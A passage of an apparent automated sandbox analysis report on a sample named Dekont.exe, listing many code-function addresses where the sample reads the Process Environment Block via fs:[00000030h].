          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E5CF mov eax, dword ptr fs:[00000030h]5_2_0100E5CF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E5CF mov eax, dword ptr fs:[00000030h]5_2_0100E5CF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A5D0 mov eax, dword ptr fs:[00000030h]5_2_0100A5D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A5D0 mov eax, dword ptr fs:[00000030h]5_2_0100A5D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCC427 mov eax, dword ptr fs:[00000030h]5_2_00FCC427
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE420 mov eax, dword ptr fs:[00000030h]5_2_00FCE420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE420 mov eax, dword ptr fs:[00000030h]5_2_00FCE420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE420 mov eax, dword ptr fs:[00000030h]5_2_00FCE420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C5ED mov eax, dword ptr fs:[00000030h]5_2_0100C5ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C5ED mov eax, dword ptr fs:[00000030h]5_2_0100C5ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008402 mov eax, dword ptr fs:[00000030h]5_2_01008402
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008402 mov eax, dword ptr fs:[00000030h]5_2_01008402
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008402 mov eax, dword ptr fs:[00000030h]5_2_01008402
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE5E7 mov eax, dword ptr fs:[00000030h]5_2_00FFE5E7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD25E0 mov eax, dword ptr fs:[00000030h]5_2_00FD25E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01056420 mov eax, dword ptr fs:[00000030h]5_2_01056420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD65D0 mov eax, dword ptr fs:[00000030h]5_2_00FD65D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A430 mov eax, dword ptr fs:[00000030h]5_2_0100A430
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E443 mov eax, dword ptr fs:[00000030h]5_2_0100E443
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF45B1 mov eax, dword ptr fs:[00000030h]5_2_00FF45B1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF45B1 mov eax, dword ptr fs:[00000030h]5_2_00FF45B1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C460 mov ecx, dword ptr fs:[00000030h]5_2_0105C460
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD2582 mov eax, dword ptr fs:[00000030h]5_2_00FD2582
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD2582 mov ecx, dword ptr fs:[00000030h]5_2_00FD2582
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8550 mov eax, dword ptr fs:[00000030h]5_2_00FD8550
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8550 mov eax, dword ptr fs:[00000030h]5_2_00FD8550
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010044B0 mov ecx, dword ptr fs:[00000030h]5_2_010044B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105A4B0 mov eax, dword ptr fs:[00000030h]5_2_0105A4B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE53E mov eax, dword ptr fs:[00000030h]5_2_00FFE53E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0535 mov eax, dword ptr fs:[00000030h]5_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C700 mov eax, dword ptr fs:[00000030h]5_2_0100C700
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01000710 mov eax, dword ptr fs:[00000030h]5_2_01000710
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C720 mov eax, dword ptr fs:[00000030h]5_2_0100C720
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C720 mov eax, dword ptr fs:[00000030h]5_2_0100C720
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104C730 mov eax, dword ptr fs:[00000030h]5_2_0104C730
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100273C mov eax, dword ptr fs:[00000030h]5_2_0100273C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100273C mov ecx, dword ptr fs:[00000030h]5_2_0100273C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100273C mov eax, dword ptr fs:[00000030h]5_2_0100273C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100674D mov esi, dword ptr fs:[00000030h]5_2_0100674D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100674D mov eax, dword ptr fs:[00000030h]5_2_0100674D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100674D mov eax, dword ptr fs:[00000030h]5_2_0100674D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01054755 mov eax, dword ptr fs:[00000030h]5_2_01054755
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012750 mov eax, dword ptr fs:[00000030h]5_2_01012750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012750 mov eax, dword ptr fs:[00000030h]5_2_01012750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E75D mov eax, dword ptr fs:[00000030h]5_2_0105E75D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4690 mov eax, dword ptr fs:[00000030h]5_2_00FD4690
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4690 mov eax, dword ptr fs:[00000030h]5_2_00FD4690
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107678E mov eax, dword ptr fs:[00000030h]5_2_0107678E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010847A0 mov eax, dword ptr fs:[00000030h]5_2_010847A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEC640 mov eax, dword ptr fs:[00000030h]5_2_00FEC640
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010507C3 mov eax, dword ptr fs:[00000030h]5_2_010507C3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD262C mov eax, dword ptr fs:[00000030h]5_2_00FD262C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE627 mov eax, dword ptr fs:[00000030h]5_2_00FEE627
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E7E1 mov eax, dword ptr fs:[00000030h]5_2_0105E7E1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE260B mov eax, dword ptr fs:[00000030h]5_2_00FE260B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD47FB mov eax, dword ptr fs:[00000030h]5_2_00FD47FB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD47FB mov eax, dword ptr fs:[00000030h]5_2_00FD47FB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E609 mov eax, dword ptr fs:[00000030h]5_2_0104E609
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF27ED mov eax, dword ptr fs:[00000030h]5_2_00FF27ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF27ED mov eax, dword ptr fs:[00000030h]5_2_00FF27ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF27ED mov eax, dword ptr fs:[00000030h]5_2_00FF27ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012619 mov eax, dword ptr fs:[00000030h]5_2_01012619
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01006620 mov eax, dword ptr fs:[00000030h]5_2_01006620
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01008620 mov eax, dword ptr fs:[00000030h]5_2_01008620
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDC7C0 mov eax, dword ptr fs:[00000030h]5_2_00FDC7C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD07AF mov eax, dword ptr fs:[00000030h]5_2_00FD07AF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A660 mov eax, dword ptr fs:[00000030h]5_2_0100A660
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A660 mov eax, dword ptr fs:[00000030h]5_2_0100A660
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109866E mov eax, dword ptr fs:[00000030h]5_2_0109866E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109866E mov eax, dword ptr fs:[00000030h]5_2_0109866E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01002674 mov eax, dword ptr fs:[00000030h]5_2_01002674
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD8770 mov eax, dword ptr fs:[00000030h]5_2_00FD8770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0770 mov eax, dword ptr fs:[00000030h]5_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C6A6 mov eax, dword ptr fs:[00000030h]5_2_0100C6A6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0750 mov eax, dword ptr fs:[00000030h]5_2_00FD0750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010066B0 mov eax, dword ptr fs:[00000030h]5_2_010066B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0100A6C7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A6C7 mov eax, dword ptr fs:[00000030h]5_2_0100A6C7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0710 mov eax, dword ptr fs:[00000030h]5_2_00FD0710
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010506F1 mov eax, dword ptr fs:[00000030h]5_2_010506F1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010506F1 mov eax, dword ptr fs:[00000030h]5_2_010506F1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E6F2 mov eax, dword ptr fs:[00000030h]5_2_0104E6F2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E908 mov eax, dword ptr fs:[00000030h]5_2_0104E908
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104E908 mov eax, dword ptr fs:[00000030h]5_2_0104E908
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C912 mov eax, dword ptr fs:[00000030h]5_2_0105C912
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0106892B mov eax, dword ptr fs:[00000030h]5_2_0106892B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105892A mov eax, dword ptr fs:[00000030h]5_2_0105892A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFE8C0 mov eax, dword ptr fs:[00000030h]5_2_00FFE8C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01050946 mov eax, dword ptr fs:[00000030h]5_2_01050946
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101096E mov eax, dword ptr fs:[00000030h]5_2_0101096E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101096E mov edx, dword ptr fs:[00000030h]5_2_0101096E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101096E mov eax, dword ptr fs:[00000030h]5_2_0101096E
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C97C mov eax, dword ptr fs:[00000030h]5_2_0105C97C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0887 mov eax, dword ptr fs:[00000030h]5_2_00FD0887
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01074978 mov eax, dword ptr fs:[00000030h]5_2_01074978
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01074978 mov eax, dword ptr fs:[00000030h]5_2_01074978
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4859 mov eax, dword ptr fs:[00000030h]5_2_00FD4859
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD4859 mov eax, dword ptr fs:[00000030h]5_2_00FD4859
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010589B3 mov esi, dword ptr fs:[00000030h]5_2_010589B3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010589B3 mov eax, dword ptr fs:[00000030h]5_2_010589B3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010589B3 mov eax, dword ptr fs:[00000030h]5_2_010589B3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE2840 mov ecx, dword ptr fs:[00000030h]5_2_00FE2840
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010669C0 mov eax, dword ptr fs:[00000030h]5_2_010669C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov ecx, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2835 mov eax, dword ptr fs:[00000030h]5_2_00FF2835
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010049D0 mov eax, dword ptr fs:[00000030h]5_2_010049D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109A9D3 mov eax, dword ptr fs:[00000030h]5_2_0109A9D3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E9E0 mov eax, dword ptr fs:[00000030h]5_2_0105E9E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010029F9 mov eax, dword ptr fs:[00000030h]5_2_010029F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010029F9 mov eax, dword ptr fs:[00000030h]5_2_010029F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C810 mov eax, dword ptr fs:[00000030h]5_2_0105C810
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]5_2_00FDA9D0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100A830 mov eax, dword ptr fs:[00000030h]5_2_0100A830
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107483A mov eax, dword ptr fs:[00000030h]5_2_0107483A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107483A mov eax, dword ptr fs:[00000030h]5_2_0107483A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD09AD mov eax, dword ptr fs:[00000030h]5_2_00FD09AD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD09AD mov eax, dword ptr fs:[00000030h]5_2_00FD09AD
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01000854 mov eax, dword ptr fs:[00000030h]5_2_01000854
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A0 mov eax, dword ptr fs:[00000030h]5_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066870 mov eax, dword ptr fs:[00000030h]5_2_01066870
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066870 mov eax, dword ptr fs:[00000030h]5_2_01066870
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E872 mov eax, dword ptr fs:[00000030h]5_2_0105E872
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105E872 mov eax, dword ptr fs:[00000030h]5_2_0105E872
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105C89D mov eax, dword ptr fs:[00000030h]5_2_0105C89D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF6962 mov eax, dword ptr fs:[00000030h]5_2_00FF6962
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF6962 mov eax, dword ptr fs:[00000030h]5_2_00FF6962
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF6962 mov eax, dword ptr fs:[00000030h]5_2_00FF6962
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC8918 mov eax, dword ptr fs:[00000030h]5_2_00FC8918
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC8918 mov eax, dword ptr fs:[00000030h]5_2_00FC8918
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109A8E4 mov eax, dword ptr fs:[00000030h]5_2_0109A8E4
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C8F9 mov eax, dword ptr fs:[00000030h]5_2_0100C8F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100C8F9 mov eax, dword ptr fs:[00000030h]5_2_0100C8F9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104EB1D mov eax, dword ptr fs:[00000030h]5_2_0104EB1D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01098B28 mov eax, dword ptr fs:[00000030h]5_2_01098B28
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01098B28 mov eax, dword ptr fs:[00000030h]5_2_01098B28
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0AD0 mov eax, dword ptr fs:[00000030h]5_2_00FD0AD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01084B4B mov eax, dword ptr fs:[00000030h]5_2_01084B4B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01084B4B mov eax, dword ptr fs:[00000030h]5_2_01084B4B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01078B42 mov eax, dword ptr fs:[00000030h]5_2_01078B42
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066B40 mov eax, dword ptr fs:[00000030h]5_2_01066B40
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01066B40 mov eax, dword ptr fs:[00000030h]5_2_01066B40
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109AB40 mov eax, dword ptr fs:[00000030h]5_2_0109AB40
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107EB50 mov eax, dword ptr fs:[00000030h]5_2_0107EB50
